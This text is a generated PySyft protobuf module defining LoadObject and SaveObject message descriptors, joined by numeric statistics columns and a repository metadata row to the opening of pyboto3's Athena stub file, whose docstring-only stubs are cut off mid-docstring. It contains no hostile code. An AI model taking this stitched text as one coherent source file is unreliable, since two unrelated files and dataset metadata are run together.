\x01(\t\x12&\n\x07\x61\x64\x64ress\x18\x04 \x01(\x0b\x32\x15.syft.core.io.Addressb\x06proto3',
    dependencies=[
        proto_dot_core_dot_common_dot_common__object__pb2.DESCRIPTOR,
        proto_dot_core_dot_io_dot_address__pb2.DESCRIPTOR,
    ],
)

# Message descriptor: LoadObjectMessage (msg_id, address, content, reply_to).
_LOADOBJECTMESSAGE = _descriptor.Descriptor(
    name="LoadObjectMessage",
    full_name="syft.grid.messages.LoadObjectMessage",
    filename=None,
    file=DESCRIPTOR,
    containing_type=None,
    create_key=_descriptor._internal_create_key,
    fields=[
        _descriptor.FieldDescriptor(
            name="msg_id",
            full_name="syft.grid.messages.LoadObjectMessage.msg_id",
            index=0,
            number=1,
            type=11,
            cpp_type=10,
            label=1,
            has_default_value=False,
            default_value=None,
            message_type=None,
            enum_type=None,
            containing_type=None,
            is_extension=False,
            extension_scope=None,
            serialized_options=None,
            file=DESCRIPTOR,
            create_key=_descriptor._internal_create_key,
        ),
        _descriptor.FieldDescriptor(
            name="address",
            full_name="syft.grid.messages.LoadObjectMessage.address",
            index=1,
            number=2,
            type=11,
            cpp_type=10,
            label=1,
            has_default_value=False,
            default_value=None,
            message_type=None,
            enum_type=None,
            containing_type=None,
            is_extension=False,
            extension_scope=None,
            serialized_options=None,
            file=DESCRIPTOR,
            create_key=_descriptor._internal_create_key,
        ),
        _descriptor.FieldDescriptor(
            name="content",
            full_name="syft.grid.messages.LoadObjectMessage.content",
            index=2,
            number=3,
            type=9,
            cpp_type=9,
            label=1,
            has_default_value=False,
            default_value=b"".decode("utf-8"),
            message_type=None,
            enum_type=None,
            containing_type=None,
            is_extension=False,
            extension_scope=None,
            serialized_options=None,
            file=DESCRIPTOR,
            create_key=_descriptor._internal_create_key,
        ),
        _descriptor.FieldDescriptor(
            name="reply_to",
            full_name="syft.grid.messages.LoadObjectMessage.reply_to",
            index=3,
            number=4,
            type=11,
            cpp_type=10,
            label=1,
            has_default_value=False,
            default_value=None,
            message_type=None,
            enum_type=None,
            containing_type=None,
            is_extension=False,
            extension_scope=None,
            serialized_options=None,
            file=DESCRIPTOR,
            create_key=_descriptor._internal_create_key,
        ),
    ],
    extensions=[],
    nested_types=[],
    enum_types=[],
    serialized_options=None,
    is_extendable=False,
    syntax="proto3",
    extension_ranges=[],
    oneofs=[],
    serialized_start=136,
    serialized_end=292,
)

# Message descriptor: LoadObjectResponse (msg_id, status_code, content, address).
_LOADOBJECTRESPONSE = _descriptor.Descriptor(
    name="LoadObjectResponse",
    full_name="syft.grid.messages.LoadObjectResponse",
    filename=None,
    file=DESCRIPTOR,
    containing_type=None,
    create_key=_descriptor._internal_create_key,
    fields=[
        _descriptor.FieldDescriptor(
            name="msg_id",
            full_name="syft.grid.messages.LoadObjectResponse.msg_id",
            index=0,
            number=1,
            type=11,
            cpp_type=10,
            label=1,
            has_default_value=False,
            default_value=None,
            message_type=None,
            enum_type=None,
            containing_type=None,
            is_extension=False,
            extension_scope=None,
            serialized_options=None,
            file=DESCRIPTOR,
            create_key=_descriptor._internal_create_key,
        ),
        _descriptor.FieldDescriptor(
            name="status_code",
            full_name="syft.grid.messages.LoadObjectResponse.status_code",
            index=1,
            number=2,
            type=5,
            cpp_type=1,
            label=1,
            has_default_value=False,
            default_value=0,
            message_type=None,
            enum_type=None,
            containing_type=None,
            is_extension=False,
            extension_scope=None,
            serialized_options=None,
            file=DESCRIPTOR,
            create_key=_descriptor._internal_create_key,
        ),
        _descriptor.FieldDescriptor(
            name="content",
            full_name="syft.grid.messages.LoadObjectResponse.content",
            index=2,
            number=3,
            type=9,
            cpp_type=9,
            label=1,
            has_default_value=False,
            default_value=b"".decode("utf-8"),
            message_type=None,
            enum_type=None,
            containing_type=None,
            is_extension=False,
            extension_scope=None,
            serialized_options=None,
            file=DESCRIPTOR,
            create_key=_descriptor._internal_create_key,
        ),
        _descriptor.FieldDescriptor(
            name="address",
            full_name="syft.grid.messages.LoadObjectResponse.address",
            index=3,
            number=4,
            type=11,
            cpp_type=10,
            label=1,
            has_default_value=False,
            default_value=None,
            message_type=None,
            enum_type=None,
            containing_type=None,
            is_extension=False,
            extension_scope=None,
            serialized_options=None,
            file=DESCRIPTOR,
            create_key=_descriptor._internal_create_key,
        ),
    ],
    extensions=[],
    nested_types=[],
    enum_types=[],
    serialized_options=None,
    is_extendable=False,
    syntax="proto3",
    extension_ranges=[],
    oneofs=[],
    serialized_start=295,
    serialized_end=432,
)

# Message descriptor: SaveObjectMessage (msg_id, address, content).
_SAVEOBJECTMESSAGE = _descriptor.Descriptor(
    name="SaveObjectMessage",
    full_name="syft.grid.messages.SaveObjectMessage",
    filename=None,
    file=DESCRIPTOR,
    containing_type=None,
    create_key=_descriptor._internal_create_key,
    fields=[
        _descriptor.FieldDescriptor(
            name="msg_id",
            full_name="syft.grid.messages.SaveObjectMessage.msg_id",
            index=0,
            number=1,
            type=11,
            cpp_type=10,
            label=1,
            has_default_value=False,
            default_value=None,
            message_type=None,
            enum_type=None,
            containing_type=None,
            is_extension=False,
            extension_scope=None,
            serialized_options=None,
            file=DESCRIPTOR,
            create_key=_descriptor._internal_create_key,
        ),
        _descriptor.FieldDescriptor(
            name="address",
            full_name="syft.grid.messages.SaveObjectMessage.address",
            index=1,
            number=2,
            type=11,
            cpp_type=10,
            label=1,
            has_default_value=False,
            default_value=None,
            message_type=None,
            enum_type=None,
            containing_type=None,
            is_extension=False,
            extension_scope=None,
            serialized_options=None,
            file=DESCRIPTOR,
            create_key=_descriptor._internal_create_key,
        ),
        _descriptor.FieldDescriptor(
            name="content",
            full_name="syft.grid.messages.SaveObjectMessage.content",
            index=2,
            number=3,
            type=9,
            cpp_type=9,
            label=1,
            has_default_value=False,
            default_value=b"".decode("utf-8"),
            message_type=None,
            enum_type=None,
            containing_type=None,
            is_extension=False,
            extension_scope=None,
            serialized_options=None,
            file=DESCRIPTOR,
            create_key=_descriptor._internal_create_key,
        ),
    ],
    extensions=[],
    nested_types=[],
    enum_types=[],
    serialized_options=None,
    is_extendable=False,
    syntax="proto3",
    extension_ranges=[],
    oneofs=[],
    serialized_start=434,
    serialized_end=549,
)

# Message descriptor: SaveObjectResponse (msg_id, status_code, content, address).
_SAVEOBJECTRESPONSE = _descriptor.Descriptor(
    name="SaveObjectResponse",
    full_name="syft.grid.messages.SaveObjectResponse",
    filename=None,
    file=DESCRIPTOR,
    containing_type=None,
    create_key=_descriptor._internal_create_key,
    fields=[
        _descriptor.FieldDescriptor(
            name="msg_id",
            full_name="syft.grid.messages.SaveObjectResponse.msg_id",
            index=0,
            number=1,
            type=11,
            cpp_type=10,
            label=1,
            has_default_value=False,
            default_value=None,
            message_type=None,
            enum_type=None,
            containing_type=None,
            is_extension=False,
            extension_scope=None,
            serialized_options=None,
            file=DESCRIPTOR,
            create_key=_descriptor._internal_create_key,
        ),
        _descriptor.FieldDescriptor(
            name="status_code",
            full_name="syft.grid.messages.SaveObjectResponse.status_code",
            index=1,
            number=2,
            type=5,
            cpp_type=1,
            label=1,
            has_default_value=False,
            default_value=0,
            message_type=None,
            enum_type=None,
            containing_type=None,
            is_extension=False,
            extension_scope=None,
            serialized_options=None,
            file=DESCRIPTOR,
            create_key=_descriptor._internal_create_key,
        ),
        _descriptor.FieldDescriptor(
            name="content",
            full_name="syft.grid.messages.SaveObjectResponse.content",
            index=2,
            number=3,
            type=9,
            cpp_type=9,
            label=1,
            has_default_value=False,
            default_value=b"".decode("utf-8"),
            message_type=None,
            enum_type=None,
            containing_type=None,
            is_extension=False,
            extension_scope=None,
            serialized_options=None,
            file=DESCRIPTOR,
            create_key=_descriptor._internal_create_key,
        ),
        _descriptor.FieldDescriptor(
            name="address",
            full_name="syft.grid.messages.SaveObjectResponse.address",
            index=3,
            number=4,
            type=11,
            cpp_type=10,
            label=1,
            has_default_value=False,
            default_value=None,
            message_type=None,
            enum_type=None,
            containing_type=None,
            is_extension=False,
            extension_scope=None,
            serialized_options=None,
            file=DESCRIPTOR,
            create_key=_descriptor._internal_create_key,
        ),
    ],
    extensions=[],
    nested_types=[],
    enum_types=[],
    serialized_options=None,
    is_extendable=False,
    syntax="proto3",
    extension_ranges=[],
    oneofs=[],
    serialized_start=552,
    serialized_end=689,
)

# Cross-file wiring: resolve message-typed fields to the descriptors
# imported from common_object.proto (UID) and address.proto (Address).
_LOADOBJECTMESSAGE.fields_by_name[
    "msg_id"
].message_type = proto_dot_core_dot_common_dot_common__object__pb2._UID
_LOADOBJECTMESSAGE.fields_by_name[
    "address"
].message_type = proto_dot_core_dot_io_dot_address__pb2._ADDRESS
_LOADOBJECTMESSAGE.fields_by_name[
    "reply_to"
].message_type = proto_dot_core_dot_io_dot_address__pb2._ADDRESS
_LOADOBJECTRESPONSE.fields_by_name[
    "msg_id"
].message_type = proto_dot_core_dot_common_dot_common__object__pb2._UID
_LOADOBJECTRESPONSE.fields_by_name[
    "address"
].message_type = proto_dot_core_dot_io_dot_address__pb2._ADDRESS
_SAVEOBJECTMESSAGE.fields_by_name[
    "msg_id"
].message_type = proto_dot_core_dot_common_dot_common__object__pb2._UID
_SAVEOBJECTMESSAGE.fields_by_name[
    "address"
].message_type = proto_dot_core_dot_io_dot_address__pb2._ADDRESS
_SAVEOBJECTRESPONSE.fields_by_name[
    "msg_id"
].message_type = proto_dot_core_dot_common_dot_common__object__pb2._UID
_SAVEOBJECTRESPONSE.fields_by_name[
    "address"
].message_type = proto_dot_core_dot_io_dot_address__pb2._ADDRESS
DESCRIPTOR.message_types_by_name["LoadObjectMessage"] = _LOADOBJECTMESSAGE
DESCRIPTOR.message_types_by_name["LoadObjectResponse"] = _LOADOBJECTRESPONSE
DESCRIPTOR.message_types_by_name["SaveObjectMessage"] = _SAVEOBJECTMESSAGE
DESCRIPTOR.message_types_by_name["SaveObjectResponse"] = _SAVEOBJECTRESPONSE
_sym_db.RegisterFileDescriptor(DESCRIPTOR)

# Concrete message classes, created via the reflection metaclass and
# registered in the default symbol database.
LoadObjectMessage = _reflection.GeneratedProtocolMessageType(
    "LoadObjectMessage",
    (_message.Message,),
    {
        "DESCRIPTOR": _LOADOBJECTMESSAGE,
        "__module__": "proto.grid.messages.transfer_messages_pb2"
        # @@protoc_insertion_point(class_scope:syft.grid.messages.LoadObjectMessage)
    },
)
_sym_db.RegisterMessage(LoadObjectMessage)
LoadObjectResponse = _reflection.GeneratedProtocolMessageType(
    "LoadObjectResponse",
    (_message.Message,),
    {
        "DESCRIPTOR": _LOADOBJECTRESPONSE,
        "__module__": "proto.grid.messages.transfer_messages_pb2"
        # @@protoc_insertion_point(class_scope:syft.grid.messages.LoadObjectResponse)
    },
)
_sym_db.RegisterMessage(LoadObjectResponse)
SaveObjectMessage = _reflection.GeneratedProtocolMessageType(
    "SaveObjectMessage",
    (_message.Message,),
    {
        "DESCRIPTOR": _SAVEOBJECTMESSAGE,
        "__module__": "proto.grid.messages.transfer_messages_pb2"
        # @@protoc_insertion_point(class_scope:syft.grid.messages.SaveObjectMessage)
    },
)
_sym_db.RegisterMessage(SaveObjectMessage)
SaveObjectResponse = _reflection.GeneratedProtocolMessageType(
    "SaveObjectResponse",
    (_message.Message,),
    {
        "DESCRIPTOR": _SAVEOBJECTRESPONSE,
        "__module__": "proto.grid.messages.transfer_messages_pb2"
        # @@protoc_insertion_point(class_scope:syft.grid.messages.SaveObjectResponse)
    },
)
_sym_db.RegisterMessage(SaveObjectResponse)
# @@protoc_insertion_point(module_scope)
| 33.494867
| 1,170
| 0.630824
| 1,719
| 16,312
| 5.631181
| 0.089587
| 0.040496
| 0.060847
| 0.055785
| 0.778512
| 0.766942
| 0.707335
| 0.703202
| 0.703202
| 0.68688
| 0
| 0.034901
| 0.272805
| 16,312
| 486
| 1,171
| 33.563786
| 0.78115
| 0.034576
| 0
| 0.799559
| 1
| 0.006608
| 0.137999
| 0.103229
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.013216
| 0
| 0.013216
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
aa76793ac46890610864fa1198baf08dec71380f
| 72,246
|
py
|
Python
|
pyboto3/athena.py
|
gehad-shaat/pyboto3
|
4a0c2851a8bc04fb1c71c36086f7bb257e48181d
|
[
"MIT"
] | 91
|
2016-12-31T11:38:37.000Z
|
2021-09-16T19:33:23.000Z
|
pyboto3/athena.py
|
gehad-shaat/pyboto3
|
4a0c2851a8bc04fb1c71c36086f7bb257e48181d
|
[
"MIT"
] | 7
|
2017-01-02T18:54:23.000Z
|
2020-08-11T13:54:02.000Z
|
pyboto3/athena.py
|
gehad-shaat/pyboto3
|
4a0c2851a8bc04fb1c71c36086f7bb257e48181d
|
[
"MIT"
] | 26
|
2016-12-31T13:11:00.000Z
|
2022-03-03T21:01:12.000Z
|
'''
The MIT License (MIT)
Copyright (c) 2016 WavyCloud
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
def batch_get_named_query(NamedQueryIds=None):
    """Return the details of up to 50 saved (named) Athena queries.

    Requires access to the workgroup in which the queries were saved; use
    ListNamedQueriesInput to obtain the named query IDs for a workgroup.
    Query IDs that could not be resolved are reported separately under
    ``UnprocessedNamedQueryIds``. Named queries differ from executed
    queries — use BatchGetQueryExecutionInput for execution details.

    See also: AWS API Documentation.

    :type NamedQueryIds: list
    :param NamedQueryIds: [REQUIRED]\nAn array of query IDs.\n\n(string) --\n\n
    :rtype: dict
    :return: A dict with two keys:

        - ``NamedQueries`` (list of dict): each entry carries 'Name',
          'Description', 'Database', 'QueryString', 'NamedQueryId' and
          'WorkGroup' for a query that was found.
        - ``UnprocessedNamedQueryIds`` (list of dict): each entry carries
          'NamedQueryId', 'ErrorCode' and 'ErrorMessage' for an ID that
          could not be processed.

    :raises:
        Athena.Client.exceptions.InternalServerException
        Athena.Client.exceptions.InvalidRequestException
    """
    pass
def batch_get_query_execution(QueryExecutionIds=None):
    """Return the details of up to 50 Athena query executions.

    Requires access to the workgroup in which the queries ran; use
    ListQueryExecutionsInput$WorkGroup to obtain execution IDs. Query
    executions differ from named (saved) queries — use
    BatchGetNamedQueryInput for details about named queries. IDs that
    could not be resolved are reported under
    ``UnprocessedQueryExecutionIds``.

    See also: AWS API Documentation.

    :type QueryExecutionIds: list
    :param QueryExecutionIds: [REQUIRED]\nAn array of query execution IDs.\n\n(string) --\n\n
    :rtype: dict
    :return: A dict with two keys:

        - ``QueryExecutions`` (list of dict): one entry per execution,
          with 'QueryExecutionId', 'Query', 'StatementType'
          ('DDL'|'DML'|'UTILITY'), 'ResultConfiguration' (output location
          and optional 'EncryptionConfiguration' with 'EncryptionOption'
          'SSE_S3'|'SSE_KMS'|'CSE_KMS' and 'KmsKey'),
          'QueryExecutionContext' ('Database'), 'Status' ('State'
          'QUEUED'|'RUNNING'|'SUCCEEDED'|'FAILED'|'CANCELLED',
          'StateChangeReason', 'SubmissionDateTime',
          'CompletionDateTime'), 'Statistics' (millisecond timings and
          'DataScannedInBytes' / 'DataManifestLocation') and 'WorkGroup'.
        - ``UnprocessedQueryExecutionIds`` (list of dict): each entry
          carries 'QueryExecutionId', 'ErrorCode' and 'ErrorMessage' for
          an ID that failed to process.

    :raises:
        Athena.Client.exceptions.InternalServerException
        Athena.Client.exceptions.InvalidRequestException
    """
    pass
def can_paginate(operation_name=None):
    """Check whether a client operation supports pagination.

    :type operation_name: string
    :param operation_name: The operation name, identical to the method
        name on the client. For example, if the method name is
        create_foo and you would normally invoke the operation as
        client.create_foo(**kwargs), then — provided the create_foo
        operation can be paginated — you can use the call
        client.get_paginator('create_foo').
    """
    pass
def create_named_query(Name=None, Description=None, Database=None, QueryString=None, ClientRequestToken=None, WorkGroup=None):
    """Create a named query in the specified workgroup.

    Requires that you have access to the workgroup. For code samples using
    the AWS SDK for Java, see Examples and Code Samples in the Amazon
    Athena User Guide.

    :type Name: string
    :param Name: [REQUIRED] The query name.
    :type Description: string
    :param Description: The query description.
    :type Database: string
    :param Database: [REQUIRED] The database to which the query belongs.
    :type QueryString: string
    :param QueryString: [REQUIRED] The contents of the query with all query
        statements.
    :type ClientRequestToken: string
    :param ClientRequestToken: A unique case-sensitive string used to make
        the request idempotent (executes only once). A repeated
        CreateNamedQuery request returns the same response without creating
        another query; if a parameter (e.g. QueryString) changed, an error
        is returned. Auto-populated by the AWS SDKs if not provided; when
        calling without an SDK or the AWS CLI you must supply it.
    :type WorkGroup: string
    :param WorkGroup: The name of the workgroup in which the named query is
        being created.
    :rtype: dict
    :return: {'NamedQueryId': 'string'} -- the unique ID of the query.

    :raises Athena.Client.exceptions.InternalServerException:
    :raises Athena.Client.exceptions.InvalidRequestException:
    """
    # Stub: the real implementation is generated by botocore at runtime.
    pass
def create_work_group(Name=None, Configuration=None, Description=None, Tags=None):
    """Create a workgroup with the specified name.

    :type Name: string
    :param Name: [REQUIRED] The workgroup name.
    :type Configuration: dict
    :param Configuration: The workgroup configuration:

        - 'ResultConfiguration' (dict): where results are stored and how
          they are encrypted -- 'OutputLocation' (str, e.g.
          ``s3://path/to/query/bucket/``) and 'EncryptionConfiguration'
          (dict with 'EncryptionOption':
          'SSE_S3'|'SSE_KMS'|'CSE_KMS' [REQUIRED] and 'KmsKey', the KMS
          key ARN or ID for SSE-KMS/CSE-KMS).
        - 'EnforceWorkGroupConfiguration' (bool): if true, workgroup
          settings override client-side settings.
        - 'PublishCloudWatchMetricsEnabled' (bool): enable Amazon
          CloudWatch metrics for the workgroup.
        - 'BytesScannedCutoffPerQuery' (int): upper limit on bytes a
          single query in the workgroup may scan.
        - 'RequesterPaysEnabled' (bool): allow members to query Amazon S3
          Requester Pays buckets (default false).
    :type Description: string
    :param Description: The workgroup description.
    :type Tags: list
    :param Tags: Tags to attach to the workgroup as you create it. Each is
        a dict with 'Key' (1-128 Unicode characters in UTF-8) and 'Value'
        (0-256 Unicode characters in UTF-8). Allowed characters include
        letters, numbers, and + - = . _ : / @. Keys and values are
        case-sensitive; keys must be unique per resource.
    :rtype: dict
    :return: {} (empty response structure)

    :raises Athena.Client.exceptions.InternalServerException:
    :raises Athena.Client.exceptions.InvalidRequestException:
    """
    # Stub: the real implementation is generated by botocore at runtime.
    pass
def delete_named_query(NamedQueryId=None):
    """Delete the named query, if you have access to its workgroup.

    For code samples using the AWS SDK for Java, see Examples and Code
    Samples in the Amazon Athena User Guide.

    :type NamedQueryId: string
    :param NamedQueryId: [REQUIRED] The unique ID of the query to delete.
        Auto-populated by the AWS SDKs if not provided.
    :rtype: dict
    :return: {} (empty response structure)

    :raises Athena.Client.exceptions.InternalServerException:
    :raises Athena.Client.exceptions.InvalidRequestException:
    """
    # Stub: the real implementation is generated by botocore at runtime.
    pass
def delete_work_group(WorkGroup=None, RecursiveDeleteOption=None):
    """Delete the workgroup with the specified name.

    The primary workgroup cannot be deleted.

    :type WorkGroup: string
    :param WorkGroup: [REQUIRED] The unique name of the workgroup to
        delete.
    :type RecursiveDeleteOption: boolean
    :param RecursiveDeleteOption: Delete the workgroup and its contents
        even if the workgroup contains any named queries.
    :rtype: dict
    :return: {} (empty response structure)

    :raises Athena.Client.exceptions.InternalServerException:
    :raises Athena.Client.exceptions.InvalidRequestException:
    """
    # Stub: the real implementation is generated by botocore at runtime.
    pass
def generate_presigned_url(ClientMethod=None, Params=None, ExpiresIn=None, HttpMethod=None):
    """Generate a presigned URL for a client method and its arguments.

    :type ClientMethod: string
    :param ClientMethod: The client method to presign for.
    :type Params: dict
    :param Params: The parameters normally passed to ClientMethod.
    :type ExpiresIn: int
    :param ExpiresIn: Number of seconds the presigned URL remains valid.
        Defaults to one hour (3600 seconds).
    :type HttpMethod: string
    :param HttpMethod: The HTTP method to use on the generated URL. By
        default, whatever method is used in the operation's model.
    """
    # Stub: the real implementation is generated by botocore at runtime.
    pass
def get_named_query(NamedQueryId=None):
    """Return information about a single named query.

    Requires that you have access to the workgroup in which the query was
    saved.

    :type NamedQueryId: string
    :param NamedQueryId: [REQUIRED] The unique ID of the query. Use
        ListNamedQueries to obtain query IDs.
    :rtype: dict
    :return: ::

        {
            'NamedQuery': {
                'Name': 'string',          # the query name
                'Description': 'string',   # the query description
                'Database': 'string',      # database the query belongs to
                'QueryString': 'string',   # the SQL statements of the query
                'NamedQueryId': 'string',  # unique identifier of the query
                'WorkGroup': 'string'      # workgroup containing the query
            }
        }

    :raises Athena.Client.exceptions.InternalServerException:
    :raises Athena.Client.exceptions.InvalidRequestException:
    """
    # Stub: the real implementation is generated by botocore at runtime.
    pass
def get_paginator(operation_name=None):
    """Create a paginator for an operation.

    :type operation_name: string
    :param operation_name: The operation name, identical to the client
        method name. For example, if the method name is ``create_foo`` and
        you would normally invoke it as ``client.create_foo(**kwargs)``,
        then when the operation can be paginated you may call
        ``client.get_paginator('create_foo')``.
    :rtype: L{botocore.paginate.Paginator}
    :return: A paginator object.
    """
    # Stub: the real implementation is generated by botocore at runtime.
    pass
def get_query_execution(QueryExecutionId=None):
    """Return information about a single execution of a query.

    Requires access to the workgroup in which the query ran. Each time a
    query executes, information about the query execution is saved with a
    unique ID.

    :type QueryExecutionId: string
    :param QueryExecutionId: [REQUIRED] The unique ID of the query
        execution.
    :rtype: dict
    :return: ::

        {
            'QueryExecution': {
                'QueryExecutionId': 'string',
                'Query': 'string',  # the SQL statements that ran
                # DDL, DML (e.g. CREATE TABLE AS SELECT), or UTILITY
                # (e.g. SHOW CREATE TABLE, DESCRIBE <table>):
                'StatementType': 'DDL'|'DML'|'UTILITY',
                # Client-side result settings; overridden by workgroup
                # settings when EnforceWorkGroupConfiguration is set:
                'ResultConfiguration': {
                    'OutputLocation': 'string',
                    'EncryptionConfiguration': {
                        'EncryptionOption': 'SSE_S3'|'SSE_KMS'|'CSE_KMS',
                        'KmsKey': 'string'  # KMS key ARN or ID
                    }
                },
                'QueryExecutionContext': {
                    'Database': 'string'  # database the query ran in
                },
                'Status': {
                    'State': 'QUEUED'|'RUNNING'|'SUCCEEDED'|'FAILED'|'CANCELLED',
                    'StateChangeReason': 'string',
                    'SubmissionDateTime': datetime(2015, 1, 1),
                    'CompletionDateTime': datetime(2015, 1, 1)
                },
                'Statistics': {
                    'EngineExecutionTimeInMillis': 123,
                    'DataScannedInBytes': 123,
                    # Manifest of files the query wrote (or intended to
                    # write, on failure) in the query results location:
                    'DataManifestLocation': 'string',
                    'TotalExecutionTimeInMillis': 123,
                    'QueryQueueTimeInMillis': 123,
                    'QueryPlanningTimeInMillis': 123,
                    'ServiceProcessingTimeInMillis': 123
                },
                'WorkGroup': 'string'  # workgroup in which the query ran
            }
        }

    :raises Athena.Client.exceptions.InternalServerException:
    :raises Athena.Client.exceptions.InvalidRequestException:
    """
    # Stub: the real implementation is generated by botocore at runtime.
    pass
def get_query_results(QueryExecutionId=None, NextToken=None, MaxResults=None):
    """Stream the results of a single query execution from Amazon S3.

    Reads results for the execution specified by QueryExecutionId from the
    Athena query results location in Amazon S3. This request does not
    execute the query; use StartQueryExecution to run a query. To stream
    results successfully, the IAM principal calling GetQueryResults must
    also have the Amazon S3 GetObject permission on the Athena query
    results location.

    :type QueryExecutionId: string
    :param QueryExecutionId: [REQUIRED] The unique ID of the query
        execution.
    :type NextToken: string
    :param NextToken: The token that specifies where to start pagination
        if a previous request was truncated.
    :type MaxResults: integer
    :param MaxResults: The maximum number of results (rows) to return in
        this request.
    :rtype: dict
    :return: ::

        {
            # Rows inserted by a CREATE TABLE AS SELECT statement:
            'UpdateCount': 123,
            'ResultSet': {
                'Rows': [
                    {
                        'Data': [
                            {'VarCharValue': 'string'},  # one field value
                        ]
                    },
                ],
                'ResultSetMetadata': {
                    'ColumnInfo': [
                        {
                            'CatalogName': 'string',
                            'SchemaName': 'string',  # database name
                            'TableName': 'string',
                            'Name': 'string',
                            'Label': 'string',
                            'Type': 'string',
                            # For DECIMAL: total digits (up to 38) and
                            # fractional digits (defaults to 0):
                            'Precision': 123,
                            'Scale': 123,
                            'Nullable': 'NOT_NULL'|'NULLABLE'|'UNKNOWN',
                            'CaseSensitive': True|False
                        },
                    ]
                }
            },
            # Token for the next request if this one was truncated:
            'NextToken': 'string'
        }

    :raises Athena.Client.exceptions.InternalServerException:
    :raises Athena.Client.exceptions.InvalidRequestException:
    """
    # Stub: the real implementation is generated by botocore at runtime.
    pass
def get_waiter(waiter_name=None):
    """Return an object that can wait for some condition.

    :type waiter_name: str
    :param waiter_name: The name of the waiter to get. See the waiters
        section of the service docs for a list of available waiters.
    :rtype: botocore.waiter.Waiter
    """
    # Stub: the real implementation is generated by botocore at runtime.
    pass
def get_work_group(WorkGroup=None):
    """Return information about the workgroup with the specified name.

    :type WorkGroup: string
    :param WorkGroup: [REQUIRED] The name of the workgroup.
    :rtype: dict
    :return: ::

        {
            'WorkGroup': {
                'Name': 'string',
                'State': 'ENABLED'|'DISABLED',
                'Configuration': {
                    # Result location/encryption; applied to all queries
                    # when EnforceWorkGroupConfiguration is true:
                    'ResultConfiguration': {
                        'OutputLocation': 'string',
                        'EncryptionConfiguration': {
                            'EncryptionOption': 'SSE_S3'|'SSE_KMS'|'CSE_KMS',
                            'KmsKey': 'string'  # KMS key ARN or ID
                        }
                    },
                    # True: workgroup settings override client-side ones:
                    'EnforceWorkGroupConfiguration': True|False,
                    'PublishCloudWatchMetricsEnabled': True|False,
                    # Per-query data-scan limit in bytes:
                    'BytesScannedCutoffPerQuery': 123,
                    # Allow queries against S3 Requester Pays buckets:
                    'RequesterPaysEnabled': True|False
                },
                'Description': 'string',
                'CreationTime': datetime(2015, 1, 1)
            }
        }

    :raises Athena.Client.exceptions.InternalServerException:
    :raises Athena.Client.exceptions.InvalidRequestException:
    """
    # Stub: the real implementation is generated by botocore at runtime.
    pass
def list_named_queries(NextToken=None, MaxResults=None, WorkGroup=None):
    """List available query IDs for queries saved in a workgroup.

    Requires that you have access to the workgroup. If a workgroup is not
    specified, lists the saved queries for the primary workgroup. For code
    samples using the AWS SDK for Java, see Examples and Code Samples in
    the Amazon Athena User Guide.

    :type NextToken: string
    :param NextToken: The token that specifies where to start pagination
        if a previous request was truncated.
    :type MaxResults: integer
    :param MaxResults: The maximum number of queries to return in this
        request.
    :type WorkGroup: string
    :param WorkGroup: The workgroup whose named queries are returned;
        defaults to the primary workgroup when not specified.
    :rtype: dict
    :return: ::

        {
            'NamedQueryIds': [
                'string',  # unique query IDs
            ],
            # Token for the next request if this one was truncated:
            'NextToken': 'string'
        }

    :raises Athena.Client.exceptions.InternalServerException:
    :raises Athena.Client.exceptions.InvalidRequestException:
    """
    # Stub: the real implementation is generated by botocore at runtime.
    pass
def list_query_executions(NextToken=None, MaxResults=None, WorkGroup=None):
    """Return the query execution IDs for queries run in a workgroup.

    Requires access to the workgroup in which the queries ran. When
    *WorkGroup* is omitted, execution IDs for the primary workgroup are
    returned.
    See also: AWS API Documentation.

    :type NextToken: string
    :param NextToken: Pagination token from a previous, truncated request.
    :type MaxResults: integer
    :param MaxResults: Maximum number of execution IDs to return per request.
    :type WorkGroup: string
    :param WorkGroup: Name of the workgroup whose query executions are returned.
    :rtype: dict
    :return: {
        'QueryExecutionIds': [
            'string',
        ],
        'NextToken': 'string'
    }

    Raises Athena.Client.exceptions.InternalServerException and
    Athena.Client.exceptions.InvalidRequestException.
    """
    pass
def list_tags_for_resource(ResourceARN=None, NextToken=None, MaxResults=None):
    """List the tags attached to a workgroup resource.

    See also: AWS API Documentation.

    :type ResourceARN: string
    :param ResourceARN: [REQUIRED]\nARN of the workgroup resource whose tags are listed.\n
    :type NextToken: string
    :param NextToken: Pagination token from a previous, truncated request, or null when no further results exist.
    :type MaxResults: integer
    :param MaxResults: Maximum number of tags to return per request.
    :rtype: dict
    :return: {
        'Tags': [
            {
                'Key': 'string',
                'Value': 'string'
            },
        ],
        'NextToken': 'string'
    }

    Each tag is a key/value label (key: 1-128 UTF-8 characters, value:
    0-256 UTF-8 characters; both case-sensitive, keys unique per resource).

    Raises Athena.Client.exceptions.InternalServerException,
    Athena.Client.exceptions.InvalidRequestException, and
    Athena.Client.exceptions.ResourceNotFoundException.
    """
    pass
def list_work_groups(NextToken=None, MaxResults=None):
    """List the workgroups available to the account.

    See also: AWS API Documentation.

    :type NextToken: string
    :param NextToken: Pagination token from a previous, truncated request.
    :type MaxResults: integer
    :param MaxResults: Maximum number of workgroups to return per request.
    :rtype: dict
    :return: {
        'WorkGroups': [
            {
                'Name': 'string',
                'State': 'ENABLED'|'DISABLED',
                'Description': 'string',
                'CreationTime': datetime(2015, 1, 1)
            },
        ],
        'NextToken': 'string'
    }

